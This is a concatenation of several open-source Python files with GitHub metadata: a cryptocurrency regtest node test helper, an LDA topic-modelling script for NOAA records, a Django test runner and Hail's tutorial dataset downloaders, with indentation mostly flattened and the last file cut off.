AddressKeyPair('mpV7aGShMkJCZgbW7F6iZgrvuPHjZjH9qg', 'cSoXt6tm3pqy43UMabY6eUTmR3eSUYFtB2iNQDGgb3VUnRsQys2k'),
AddressKeyPair('mq4fBNdckGtvY2mijd9am7DRsbRB4KjUkf', 'cN55daf1HotwBAgAKWVgDcoppmUNDtQSfb7XLutTLeAgVc3u8hik'),
AddressKeyPair('mpFAHDjX7KregM3rVotdXzQmkbwtbQEnZ6', 'cT7qK7g1wkYEMvKowd2ZrX1E5f6JQ7TM246UfqbCiyF7kZhorpX3'),
AddressKeyPair('mzRe8QZMfGi58KyWCse2exxEFry2sfF2Y7', 'cPiRWE8KMjTRxH1MWkPerhfoHFn5iHPWVK5aPqjW8NxmdwenFinJ'),
]
def get_deterministic_priv_key(self):
"""Return a deterministic priv key in base58, that only depends on the node's index"""
assert len(self.PRIV_KEYS) == MAX_NODES
return self.PRIV_KEYS[self.index]
def _node_msg(self, msg: str) -> str:
"""Return a modified msg that identifies this node by its index as a debugging aid."""
return "[node %d] %s" % (self.index, msg)
def _raise_assertion_error(self, msg: str):
"""Raise an AssertionError with msg modified to identify this node."""
raise AssertionError(self._node_msg(msg))
def __del__(self):
# Ensure that we don't leave any bitcoind processes lying around after
# the test ends
if self.process and self.cleanup_on_exit:
# Should only happen on test failure
# Avoid using logger, as that may have already been shutdown when
# this destructor is called.
print(self._node_msg("Cleaning up leftover process"))
self.process.kill()
def __getattr__(self, name):
"""Dispatches any unrecognised messages to the RPC connection or a CLI instance."""
if self.use_cli:
return getattr(self.cli, name)
else:
assert self.rpc_connected and self.rpc is not None, self._node_msg("Error: no RPC connection")
return getattr(self.rpc, name)
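    # Usage sketch (illustrative, not part of the original file): because of the
    # dispatch above, a test can call RPC methods directly on the node object,
    # e.g. node.getblockcount() or node.getblockhash(0); the call is forwarded
    # to self.rpc, or to bitcoin-cli when use_cli=True.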
def start(self, extra_args=None, *, cwd=None, stdout=None, stderr=None, **kwargs):
"""Start the node."""
if extra_args is None:
extra_args = self.extra_args
# Add a new stdout and stderr file each time bitcoind is started
if stderr is None:
stderr = tempfile.NamedTemporaryFile(dir=self.stderr_dir, delete=False)
if stdout is None:
stdout = tempfile.NamedTemporaryFile(dir=self.stdout_dir, delete=False)
self.stderr = stderr
self.stdout = stdout
if cwd is None:
cwd = self.cwd
# Delete any existing cookie file -- if such a file exists (eg due to
# unclean shutdown), it will get overwritten anyway by bitcoind, and
# potentially interfere with our attempt to authenticate
delete_cookie_file(self.datadir, self.chain)
# add environment variable LIBC_FATAL_STDERR_=1 so that libc errors are written to stderr and not the terminal
subp_env = dict(os.environ, LIBC_FATAL_STDERR_="1")
self.process = subprocess.Popen(self.args + extra_args, env=subp_env, stdout=stdout, stderr=stderr, cwd=cwd, **kwargs)
self.running = True
self.log.debug("bitcoind started, waiting for RPC to come up")
if self.start_perf:
self._start_perf()
def wait_for_rpc_connection(self):
"""Sets up an RPC connection to the bitcoind process. Returns False if unable to connect."""
# Poll at a rate of four times per second
poll_per_s = 4
for _ in range(poll_per_s * self.rpc_timeout):
if self.process.poll() is not None:
raise FailedToStartError(self._node_msg(
'bitcoind exited with status {} during initialization'.format(self.process.returncode)))
try:
rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.chain, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir)
rpc.getblockcount()
# If the call to getblockcount() succeeds then the RPC connection is up
self.log.debug("RPC successfully started")
if self.use_cli:
return
self.rpc = rpc
self.rpc_connected = True
self.url = self.rpc.url
return
except IOError as e:
if e.errno != errno.ECONNREFUSED: # Port not yet open?
raise # unknown IO error
except JSONRPCException as e: # Initialization phase
# -28 RPC in warmup
# -342 Service unavailable, RPC server started but is shutting down due to error
if e.error['code'] != -28 and e.error['code'] != -342:
raise # unknown JSON RPC exception
except ConnectionResetError:
# This might happen when the RPC server is in warmup, but shut down before the call to getblockcount
# succeeds. Try again to properly raise the FailedToStartError
pass
            except ValueError as e: # cookie file not found and no rpcuser or rpcpassword. bitcoind still starting
if "No RPC credentials" not in str(e):
raise
time.sleep(1.0 / poll_per_s)
self._raise_assertion_error("Unable to connect to bitcoind")
def generate(self, nblocks, maxtries=1000000):
self.log.debug("TestNode.generate() dispatches `generate` call to `generatetoaddress`")
return self.generatetoaddress(nblocks=nblocks, address=self.get_deterministic_priv_key().address, maxtries=maxtries)
def get_wallet_rpc(self, wallet_name):
if self.use_cli:
return self.cli("-rpcwallet={}".format(wallet_name))
else:
assert self.rpc_connected and self.rpc, self._node_msg("RPC not connected")
wallet_path = "wallet/{}".format(urllib.parse.quote(wallet_name))
return self.rpc / wallet_path
def stop_node(self, expected_stderr='', wait=0):
"""Stop the node."""
if not self.running:
return
self.log.debug("Stopping node")
try:
# Do not use wait argument when testing older nodes, e.g. in feature_backwards_compatibility.py
if self.version is None or self.version >= 180000:
self.stop(wait=wait)
else:
self.stop()
except http.client.CannotSendRequest:
self.log.exception("Unable to stop node.")
# If there are any running perf processes, stop them.
for profile_name in tuple(self.perf_subprocesses.keys()):
self._stop_perf(profile_name)
# Check that stderr is as expected
self.stderr.seek(0)
stderr = self.stderr.read().decode('utf-8').strip()
if stderr != expected_stderr:
raise AssertionError("Unexpected stderr {} != {}".format(stderr, expected_stderr))
self.stdout.close()
self.stderr.close()
del self.p2ps[:]
def is_node_stopped(self):
"""Checks whether the node has stopped.
Returns True if the node has stopped. False otherwise.
This method is responsible for freeing resources (self.process)."""
if not self.running:
return True
return_code = self.process.poll()
if return_code is None:
return False
# process has stopped. Assert that it didn't return an error code.
assert return_code == 0, self._node_msg(
"Node returned non-zero exit code (%d) when stopping" % return_code)
self.running = False
self.process = None
self.rpc_connected = False
self.rpc = None
self.log.debug("Node stopped")
return True
def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT):
wait_until(self.is_node_stopped, timeout=timeout)
@contextlib.contextmanager
def assert_debug_log(self, expected_msgs, unexpected_msgs=None, timeout=2):
if unexpected_msgs is None:
unexpected_msgs = []
time_end = time.time() + timeout
debug_log = os.path.join(self.datadir, self.chain, 'debug.log')
with open(debug_log, encoding='utf-8') as dl:
dl.seek(0, 2)
prev_size = dl.tell()
yield
while True:
found = True
with open(debug_log, encoding='utf-8') as dl:
dl.seek(prev_size)
log = dl.read()
print_log = " - " + "\n - ".join(log.splitlines())
for unexpected_msg in unexpected_msgs:
if re.search(re.escape(unexpected_msg), log, flags=re.MULTILINE):
self._raise_assertion_error('Unexpected message "{}" partially matches log:\n\n{}\n\n'.format(unexpected_msg, print_log))
for expected_msg in expected_msgs:
if re.search(re.escape(expected_msg), log, flags=re.MULTILINE) is None:
found = False
if found:
return
if time.time() >= time_end:
break
time.sleep(0.05)
self._raise_assertion_error('Expected messages "{}" does not partially match log:\n\n{}\n\n'.format(str(expected_msgs), print_log))
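    # Usage sketch (illustrative): a test would typically write
    #   with node.assert_debug_log(expected_msgs=["some message"]):
    #       node.trigger_the_behaviour()
    # and the context manager raises if the message never shows up in debug.log
    # within the timeout; the message and helper name here are placeholders.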
@contextlib.contextmanager
def profile_with_perf(self, profile_name):
"""
Context manager that allows easy profiling of node activity using `perf`.
See `test/functional/README.md` for details on perf usage.
Args:
profile_name (str): This string will be appended to the
profile data filename generated by perf.
"""
subp = self._start_perf(profile_name)
yield
if subp:
self._stop_perf(profile_name)
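    # Usage sketch (illustrative): wrap a workload so perf samples it, e.g.
    #   with node.profile_with_perf("ibd"):
    #       run_workload()
    # "ibd" and run_workload are placeholders, not names from this repository.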
def _start_perf(self, profile_name=None):
"""Start a perf process to profile this node.
Returns the subprocess running perf."""
subp = None
def test_success(cmd):
return subprocess.call(
# shell=True required for pipe use below
cmd, shell=True,
stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL) == 0
if not sys.platform.startswith('linux'):
self.log.warning("Can't profile with perf; only available on Linux platforms")
return None
if not test_success('which perf'):
self.log.warning("Can't profile with perf; must install perf-tools")
return None
if not test_success('readelf -S {} | grep .debug_str'.format(shlex.quote(self.binary))):
self.log.warning(
"perf output won't be very useful without debug symbols compiled into bitcoind")
output_path = tempfile.NamedTemporaryFile(
dir=self.datadir,
prefix="{}.perf.data.".format(profile_name or 'test'),
delete=False,
).name
cmd = [
'perf', 'record',
'-g', # Record the callgraph.
'--call-graph', 'dwarf', # Compatibility for gcc's --fomit-frame-pointer.
'-F', '101', # Sampling frequency in Hz.
'-p', str(self.process.pid),
'-o', output_path,
]
subp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.perf_subprocesses[profile_name] = subp
return subp
def _stop_perf(self, profile_name):
"""Stop (and pop) a perf subprocess."""
subp = self.perf_subprocesses.pop(profile_name)
output_path = subp.args[subp.args.index('-o') + 1]
subp.terminate()
subp.wait(timeout=10)
stderr = subp.stderr.read().decode()
if 'Consider tweaking /proc/sys/kernel/perf_event_paranoid' in stderr:
self.log.warning(
"perf couldn't collect data! Try "
"'sudo sysctl -w kernel.perf_event_paranoid=-1'")
else:
report_cmd = "perf report -i {}".format(output_path)
self.log.info("See perf output by running '{}'".format(report_cmd))
def assert_start_raises_init_error(self, extra_args=None, expected_msg=None, match=ErrorMatch.FULL_TEXT, *args, **kwargs):
"""Attempt to start the node and expect it to raise an error.
extra_args: extra arguments to pass through to bitcoind
expected_msg: regex that stderr should match when bitcoind fails
Will throw if bitcoind starts without an error.
        Will throw if an expected_msg is provided and it does not match bitcoind's stderr.
with tempfile.NamedTemporaryFile(dir=self.stderr_dir, delete=False) as log_stderr, \
tempfile.NamedTemporaryFile(dir=self.stdout_dir, delete=False) as log_stdout:
try:
self.start(extra_args, stdout=log_stdout, stderr=log_stderr, *args, **kwargs)
self.wait_for_rpc_connection()
self.stop_node()
self.wait_until_stopped()
except FailedToStartError as e:
self.log.debug('bitcoind failed to start: %s', e)
self.running = False
self.process = None
# Check stderr for expected message
if expected_msg is not None:
log_stderr.seek(0)
stderr = log_stderr.read().decode('utf-8').strip()
if match == ErrorMatch.PARTIAL_REGEX:
if re.search(expected_msg, stderr, flags=re.MULTILINE) is None:
self._raise_assertion_error(
'Expected message "{}" does not partially match stderr:\n"{}"'.format(expected_msg, stderr))
elif match == ErrorMatch.FULL_REGEX:
if re.fullmatch(expected_msg, stderr) is None:
self._raise_assertion_error(
'Expected message "{}" does not fully match stderr:\n"{}"'.format(expected_msg, stderr))
elif match == ErrorMatch.FULL_TEXT:
if expected_msg != stderr:
self._raise_assertion_error(
'Expected message "{}" does not fully match stderr:\n"{}"'.format(expected_msg, stderr))
else:
if expected_msg is None:
assert_msg = "bitcoind should have exited with an error"
else:
assert_msg = "bitcoind should have exited with expected error " + expected_msg
self._raise_assertion_error(assert_msg)
def add_p2p_connection(self, p2p_conn, *, wait_for_verack=True, **kwargs):
"""Add a p2p connection to the node.
This method adds the p2p connection to the self.p2ps list and also
returns the connection to the caller."""
if 'dstport' not in kwargs:
kwargs['dstport'] = p2p_port(self.index)
if 'dstaddr' not in kwargs:
kwargs['dstaddr'] = '127.0.0.1'
p2p_conn.peer_connect(**kwargs, net=self.chain)()
self.p2ps.append(p2p_conn)
if wait_for_verack:
# Wait for the node to send us the version and verack
p2p_conn.wait_for_verack()
# At this point we have sent our version message and received the version and verack, however the full node
# has not yet received the verack from us (in reply to their version). So, the connection is not yet fully
# established (fSuccessfullyConnected).
#
# This shouldn't lead to any issues when sending messages, since the verack will be in-flight before the
# message we send. However, it might lead to races where we are expecting to receive a message. E.g. a
# transaction that will be added to the mempool as soon as we return here.
#
# So syncing here is redundant when we only want to send a message, but the cost is low (a few milliseconds)
            # in comparison to the upside of making tests less fragile and unexpected intermittent errors less likely.
p2p_conn.sync_with_ping()
return p2p_conn
@property
def p2p(self):
"""Return the first p2p connection
Convenience property - most tests only use a single p2p connection to each
node, so this saves having to write node.p2ps[0] many times."""
assert self.p2ps, self._node_msg("No p2p connection")
return self.p2ps[0]
def disconnect_p2ps(self):
"""Close all p2p connections to the node."""
for p in self.p2ps:
p.peer_disconnect()
del self.p2ps[:]
class TestNodeCLIAttr:
def __init__(self, cli, command):
self.cli = cli
self.command = command
def __call__(self, *args, **kwargs):
return self.cli.send_cli(self.command, *args, **kwargs)
def get_request(self, *args, **kwargs):
return lambda: self(*args, **kwargs)
def arg_to_cli(arg):
if isinstance(arg, bool):
return str(arg).lower()
elif isinstance(arg, dict) or isinstance(arg, list):
return json.dumps(arg, default=EncodeDecimal)
else:
return str(arg)
class TestNodeCLI():
"""Interface to bitcoin-cli for an individual node"""
def __init__(self, binary, datadir):
self.options = []
self.binary = binary
self.datadir = datadir
self.input = None
self.log = logging.getLogger('TestFramework.bitcoincli')
def __call__(self, *options, input=None):
# TestNodeCLI is callable with bitcoin-cli command-line options
cli = TestNodeCLI(self.binary, self.datadir)
cli.options = [str(o) for o in options]
cli.input = input
return cli
def __getattr__(self, command):
return TestNodeCLIAttr(self, command)
def batch(self, requests):
results = []
for request in requests:
try:
results.append(dict(result=request()))
except JSONRPCException as e:
results.append(dict(error=e))
return results
def send_cli(self, command=None, *args, **kwargs):
"""Run bitcoin-cli command. Deserializes returned string as python object."""
pos_args = [arg_to_cli(arg) for arg in args]
named_args = [str(key) + "=" + arg_to_cli(value) for (key, value) in kwargs.items()]
assert not (pos_args and named_args), "Cannot use positional arguments and named arguments in the same bitcoin-cli call"
p_args = [self.binary, "-datadir=" + self.datadir] + self.options
if named_args:
p_args += ["-named"]
if command is not None:
p_args += [command]
p_args += pos_args + named_args
self.log.debug("Running bitcoin-cli command: %s" % command)
process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
cli_stdout, cli_stderr = process.communicate(input=self.input)
returncode = process.poll()
if returncode:
match = re.match(r'error code: ([-0-9]+)\nerror message:\n(.*)', cli_stderr)
if match:
code, message = match.groups()
raise JSONRPCException(dict(code=int(code), message=message))
# Ignore cli_stdout, raise with cli_stderr
raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr)
try:
return json.loads(cli_stdout, parse_float=decimal.Decimal)
except json.JSONDecodeError:
return cli_stdout.rstrip("\n")
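# Usage sketch (illustrative, not part of the original file): the same attribute
# dispatch works through bitcoin-cli when use_cli=True, e.g.
#   node.cli.getblockcount()
#   node.cli('-rpcwallet=mywallet').getbalance()
# where "mywallet" is a placeholder wallet name.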
|
{
"content_hash": "e9b18052d4e1f2507aa82a6cbd02a56d",
"timestamp": "",
"source": "github",
"line_count": 578,
"max_line_length": 207,
"avg_line_length": 43.08477508650519,
"alnum_prop": 0.6101272939003333,
"repo_name": "ahmedbodi/vertcoin",
"id": "53bc5ca9e7a15db56b851383b84393e5c278e66d",
"size": "25117",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "test/functional/test_framework/test_node.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "28456"
},
{
"name": "C",
"bytes": "1163389"
},
{
"name": "C++",
"bytes": "4857520"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "HTML",
"bytes": "50622"
},
{
"name": "Java",
"bytes": "30290"
},
{
"name": "M4",
"bytes": "185589"
},
{
"name": "Makefile",
"bytes": "108571"
},
{
"name": "Objective-C",
"bytes": "3892"
},
{
"name": "Objective-C++",
"bytes": "7232"
},
{
"name": "Protocol Buffer",
"bytes": "2328"
},
{
"name": "Python",
"bytes": "1076417"
},
{
"name": "QMake",
"bytes": "756"
},
{
"name": "Shell",
"bytes": "48193"
}
],
"symlink_target": ""
}
|
"""
Notes: In LDA, time complexity is proportional to (n_samples * iterations).
"""
#####################################################################
# Imports
#####################################################################
from __future__ import print_function # Not necessary for Python 3
from time import time
import re
import csv
import json
import pymongo
import requests
import numpy as np
from sklearn.feature_extraction import text
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation
#####################################################################
# Global Variables
#####################################################################
conn=pymongo.MongoClient()
db = conn.earthwindfire
noaa_coll = db.noaa_coll
n_features = 200000
n_topics = 50
n_top_words = 30
domain_stops = ["department","commerce","doc","noaa","national", "data", \
"centers", "united", "states", "administration"]
stopwords = text.ENGLISH_STOP_WORDS.union(domain_stops)
#####################################################################
# Helper Functions
#####################################################################
def saveClusters(model, feature_names, n_top_words):
"""
Takes the model, the names of the features, and the
requested number of top words for each cluster, and
    yields each cluster's label and its top words.
"""
for topic_idx, topic in enumerate(model.components_):
t = "Topic #%d:" % (topic_idx+1)
topwords = []
x = topic.argsort()
y = x[:-n_top_words - 1:-1]
for i in y:
topwords.append(feature_names[i].encode('utf-8'))
yield t,topwords
def getWords(feature_names,cluster_id):
"""
Just return the words for a given cluster, with given feature_names.
"""
words = []
for topic_idx, topic in enumerate(lda.components_):
if topic_idx == cluster_id:
words.append(" ".join([tf_feature_names[i].encode('utf-8') for i in topic.argsort()[:-31:-1]]))
return words
def printClusters(model, feature_names, n_top_words):
"""
Takes the model, the names of the features, and the
requested number of top words for each cluster, and
prints out each cluster.
"""
for topic_idx, topic in enumerate(model.components_):
print("Topic #%d:" % (topic_idx+1))
print(" ".join([feature_names[i]
for i in topic.argsort()[:-n_top_words - 1:-1]]))
print()
def loadData(URL,collection):
"""
Loads the JSON data from URL, connects to MongoDB & enters dicts into collection
"""
if collection.count() > 20000:
print("%d records already loaded" % collection.count())
else:
r = requests.get(URL)
json_data = r.json()
for dataset in json_data:
data ={}
data["title"] = dataset["title"]
data["description"] = dataset["description"]
data["keywords"] = dataset["keyword"]
collection.insert_one(data)
print("Successfully loaded %d records into MongoDB." % collection.count())
def wrangleData(collection):
"""
Reads in MongoDB documents, extracts and joins the content from the relevant
fields for each record (keyword, title, description) and returns a list.
"""
data_samples = []
for entry in collection.find():
title = " ".join(filter(lambda x: x.isalpha(), entry[u'title'].split()))
description = " ".join(filter(lambda x: x.isalpha(), entry[u'description'].split()))
keywords = " ".join(filter(lambda x: x.isalpha(), entry[u'keywords']))
data_samples.append(title+" "+description+" "+keywords)
return data_samples
if __name__ == '__main__':
with open('lda_clusters_v2.csv', 'wb') as f1:
writer = csv.writer(f1)
writer.writerow(["cluster","top words"])
# Start the clock
t0 = time()
# Load the data into MongoDB
print("Checking to see if you have the data...")
loadData("https://data.noaa.gov/data.json",noaa_coll)
noaa_samples = wrangleData(noaa_coll)
print("done in %0.3fs." % (time() - t0))
# Restart the clock
t0 = time()
# Extract raw term counts to compute term frequency.
print("Extracting term frequency features for LDA...")
tf_vectorizer = CountVectorizer(max_df=0.95, min_df=2, ngram_range=(1,2),
stop_words=stopwords)
tf = tf_vectorizer.fit_transform(noaa_samples)
print("done in %0.3fs." % (time() - t0))
# Restart the clock
t0 = time()
# Fit the LDA model
print("Fitting LDA model with term frequency features, n_samples=%d and n_features=%d..."
% (len(noaa_samples), n_features))
lda = LatentDirichletAllocation(n_topics=n_topics, max_iter=5, learning_offset=50.,
random_state=0)
lda.fit(tf)
print("done in %0.3fs." % (time() - t0))
# Save the clusters
tf_feature_names = tf_vectorizer.get_feature_names()
for x in saveClusters(lda, tf_feature_names, n_top_words):
writer.writerow([str(x[0]),str(x[1])])
        # # You can also print out the clusters if you want to see them
# printClusters(lda, tf_feature_names, n_top_words)
# Now match up the records with the best fit clusters & corresponding keywords
with open('records_to_ldaclusters_v2.csv', 'wb') as f2:
writer = csv.writer(f2)
writer.writerow(["record_index","record_text","five_best_clusters","suggested_keywords"])
# Restart the clock
t0 = time()
print("Finding the best keywords for each record and writing up results...")
results = lda.transform(tf)
for i in range(len(results)):
try:
best_results = (-results[i]).argsort()[:5]
keywords = []
for x in np.nditer(best_results):
keywords.extend(getWords(tf_feature_names, x))
flattened = " ".join(keywords)
writer.writerow([i, noaa_samples[i], best_results, flattened])
#TODO => need to figure out the Unicode Error
except UnicodeEncodeError: pass
print("done in %0.3fs." % (time() - t0))
|
{
"content_hash": "c335fe0b254898aae7440f9cf489ecde",
"timestamp": "",
"source": "github",
"line_count": 172,
"max_line_length": 107,
"avg_line_length": 37.2093023255814,
"alnum_prop": 0.565625,
"repo_name": "CommerceDataService/recordtagger",
"id": "a148b6dd64ede92a4e98721ed294036dde2e6f8f",
"size": "6658",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lda/lda_tag.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "29340"
}
],
"symlink_target": ""
}
|
from . import base
|
{
"content_hash": "123e81593bbb9185b6e4f5d8cdf3bb2f",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 18,
"avg_line_length": 19,
"alnum_prop": 0.7368421052631579,
"repo_name": "pl8787/MatchPyramid-TensorFlow",
"id": "0e44449338cf3ff3bb3d124ef22c8f7bbca760a5",
"size": "19",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "pytextnet/io/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16716"
}
],
"symlink_target": ""
}
|
import sys
import django
from django.conf import settings, global_settings as default_settings
from django.core.management import execute_from_command_line
if not settings.configured:
settings.configure(
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
}
},
TEMPLATE_LOADERS = (
'django.template.loaders.app_directories.Loader',
),
TEMPLATE_CONTEXT_PROCESSORS = default_settings.TEMPLATE_CONTEXT_PROCESSORS + (
'django.core.context_processors.request',
),
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sites',
'django.contrib.admin',
'fluent_contents',
#'fluent_contents.plugins.code',
'fluent_contents.plugins.commentsarea',
#'fluent_contents.plugins.disquswidgets',
#'fluent_contents.plugins.formdesignerlink',
'fluent_contents.plugins.gist',
'fluent_contents.plugins.googledocsviewer',
'fluent_contents.plugins.iframe',
#'fluent_contents.plugins.markup',
#'fluent_contents.plugins.oembeditem',
#'fluent_contents.plugins.picture',
'fluent_contents.plugins.rawhtml',
#'fluent_contents.plugins.sharedcontent',
'fluent_contents.plugins.text',
#'fluent_contents.plugins.twitterfeed',
#'disqus',
'django_wysiwyg',
#'form_designer',
'fluent_contents.tests.testapp',
),
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
),
ROOT_URLCONF = 'fluent_contents.tests.testapp.urls',
TEST_RUNNER = 'django.test.simple.DjangoTestSuiteRunner' if django.VERSION < (1,6) else 'django.test.runner.DiscoverRunner',
SITE_ID = 3,
FLUENT_CONTENTS_CACHE_OUTPUT = True,
FLUENT_CONTENTS_CACHE_PLACEHOLDER_OUTPUT = True,
#DISQUS_API_KEY = 'test',
#DISQUS_WEBSITE_SHORTNAME = 'test',
STATIC_URL = '/static/',
)
if django.VERSION < (1,6):
# Different test runner, needs to name all apps,
# it doesn't locate a tests*.py in each subfolder.
DEFAULT_TEST_APPS = [
'fluent_contents',
'text',
]
else:
DEFAULT_TEST_APPS = [
'fluent_contents',
]
def runtests():
other_args = list(filter(lambda arg: arg.startswith('-'), sys.argv[1:]))
test_apps = list(filter(lambda arg: not arg.startswith('-'), sys.argv[1:])) or DEFAULT_TEST_APPS
argv = sys.argv[:1] + ['test', '--traceback'] + other_args + test_apps
execute_from_command_line(argv)
if __name__ == '__main__':
runtests()
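# Usage sketch (illustrative): "python runtests.py" runs the default apps listed
# above, while e.g. "python runtests.py text --verbosity=2" would test only the
# 'text' plugin; any extra flags are passed straight to Django's test command.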
|
{
"content_hash": "54cbd30b1b35644479c9d5f9d8d0bed4",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 132,
"avg_line_length": 37.39506172839506,
"alnum_prop": 0.5985473753714097,
"repo_name": "jpotterm/django-fluent-contents",
"id": "d7a00b5561629e6e5dee0961610102375f58cdc3",
"size": "3051",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "runtests.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13178"
},
{
"name": "HTML",
"bytes": "33138"
},
{
"name": "JavaScript",
"bytes": "80446"
},
{
"name": "Python",
"bytes": "450641"
}
],
"symlink_target": ""
}
|
import hail as hl
from .java import Env, info
from .misc import new_temp_file, local_path_uri, new_local_temp_dir
import os
import zipfile
from urllib.request import urlretrieve
from hailtop.utils import sync_retry_transient_errors
__all__ = [
'get_1kg',
'get_hgdp',
'get_movie_lens'
]
resources = {
'1kg_annotations': 'https://storage.googleapis.com/hail-tutorial/1kg_annotations.txt',
'1kg_matrix_table': 'https://storage.googleapis.com/hail-tutorial/1kg.vcf.bgz',
'1kg_ensembl_gene_annotations': 'https://storage.googleapis.com/hail-tutorial/ensembl_gene_annotations.txt',
'HGDP_annotations': 'https://storage.googleapis.com/hail-tutorial/hgdp/hgdp_pop_and_sex_annotations.tsv',
'HGDP_matrix_table': 'https://storage.googleapis.com/hail-tutorial/hgdp/hgdp_subset.vcf.bgz',
'HGDP_ensembl_gene_annotations': 'https://storage.googleapis.com/hail-tutorial/hgdp/hgdp_gene_annotations.tsv',
'movie_lens_100k': 'https://files.grouplens.org/datasets/movielens/ml-100k.zip',
}
tmp_dir: str = None
def init_temp_dir():
global tmp_dir
if tmp_dir is None:
tmp_dir = new_local_temp_dir()
def _dir_exists(fs, path):
return fs.exists(path) and fs.is_dir(path)
def _file_exists(fs, path):
return fs.exists(path) and fs.is_file(path)
def _copy_to_tmp(fs, src, extension=None):
dst = new_temp_file(extension=extension)
fs.copy(src, dst)
return dst
def get_1kg(output_dir, overwrite: bool = False):
"""Download subset of the `1000 Genomes <http://www.internationalgenome.org/>`__
dataset and sample annotations.
Notes
-----
The download is about 15M.
Parameters
----------
output_dir
Directory in which to write data.
overwrite
If ``True``, overwrite any existing files/directories at `output_dir`.
"""
fs = Env.fs()
if not _dir_exists(fs, output_dir):
fs.mkdir(output_dir)
matrix_table_path = os.path.join(output_dir, '1kg.mt')
vcf_path = os.path.join(output_dir, '1kg.vcf.bgz')
sample_annotations_path = os.path.join(output_dir, '1kg_annotations.txt')
gene_annotations_path = os.path.join(output_dir, 'ensembl_gene_annotations.txt')
if (overwrite
or not _dir_exists(fs, matrix_table_path)
or not _file_exists(fs, sample_annotations_path)
or not _file_exists(fs, vcf_path)
or not _file_exists(fs, gene_annotations_path)):
init_temp_dir()
tmp_vcf = os.path.join(tmp_dir, '1kg.vcf.bgz')
source = resources['1kg_matrix_table']
info(f'downloading 1KG VCF ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, resources['1kg_matrix_table'], tmp_vcf)
cluster_readable_vcf = _copy_to_tmp(fs, local_path_uri(tmp_vcf), extension='vcf.bgz')
info('importing VCF and writing to matrix table...')
hl.import_vcf(cluster_readable_vcf, min_partitions=16).write(matrix_table_path, overwrite=True)
tmp_sample_annot = os.path.join(tmp_dir, '1kg_annotations.txt')
source = resources['1kg_annotations']
info(f'downloading 1KG annotations ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, source, tmp_sample_annot)
tmp_gene_annot = os.path.join(tmp_dir, 'ensembl_gene_annotations.txt')
source = resources['1kg_ensembl_gene_annotations']
info(f'downloading Ensembl gene annotations ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, source, tmp_gene_annot)
hl.hadoop_copy(local_path_uri(tmp_sample_annot), sample_annotations_path)
hl.hadoop_copy(local_path_uri(tmp_gene_annot), gene_annotations_path)
hl.hadoop_copy(local_path_uri(tmp_vcf), vcf_path)
info('Done!')
else:
info('1KG files found')
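# Usage sketch (illustrative): in the Hail tutorials this is called roughly as
#   import hail as hl
#   hl.init()
#   hl.utils.get_1kg('data/')
# which leaves data/1kg.mt, data/1kg.vcf.bgz and the annotation files in place;
# 'data/' is just an example output directory.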
def get_hgdp(output_dir, overwrite: bool = False):
"""Download subset of the `Human Genome Diversity Panel
<https://www.internationalgenome.org/data-portal/data-collection/hgdp/>`__
dataset and sample annotations.
Notes
-----
The download is about 30MB.
Parameters
----------
output_dir
Directory in which to write data.
overwrite
If ``True``, overwrite any existing files/directories at `output_dir`.
"""
fs = Env.fs()
if not _dir_exists(fs, output_dir):
fs.mkdir(output_dir)
matrix_table_path = os.path.join(output_dir, 'HGDP.mt')
vcf_path = os.path.join(output_dir, 'HGDP.vcf.bgz')
sample_annotations_path = os.path.join(output_dir, 'HGDP_annotations.txt')
gene_annotations_path = os.path.join(output_dir, 'ensembl_gene_annotations.txt')
if (overwrite
or not _dir_exists(fs, matrix_table_path)
or not _file_exists(fs, sample_annotations_path)
or not _file_exists(fs, vcf_path)
or not _file_exists(fs, gene_annotations_path)):
init_temp_dir()
tmp_vcf = os.path.join(tmp_dir, 'HGDP.vcf.bgz')
source = resources['HGDP_matrix_table']
info(f'downloading HGDP VCF ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, resources['HGDP_matrix_table'], tmp_vcf)
cluster_readable_vcf = _copy_to_tmp(fs, local_path_uri(tmp_vcf), extension='vcf.bgz')
info('importing VCF and writing to matrix table...')
hl.import_vcf(cluster_readable_vcf, min_partitions=16, reference_genome='GRCh38').write(matrix_table_path, overwrite=True)
tmp_sample_annot = os.path.join(tmp_dir, 'HGDP_annotations.txt')
source = resources['HGDP_annotations']
info(f'downloading HGDP annotations ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, source, tmp_sample_annot)
tmp_gene_annot = os.path.join(tmp_dir, 'ensembl_gene_annotations.txt')
source = resources['HGDP_ensembl_gene_annotations']
info(f'downloading Ensembl gene annotations ...\n'
f' Source: {source}')
sync_retry_transient_errors(urlretrieve, source, tmp_gene_annot)
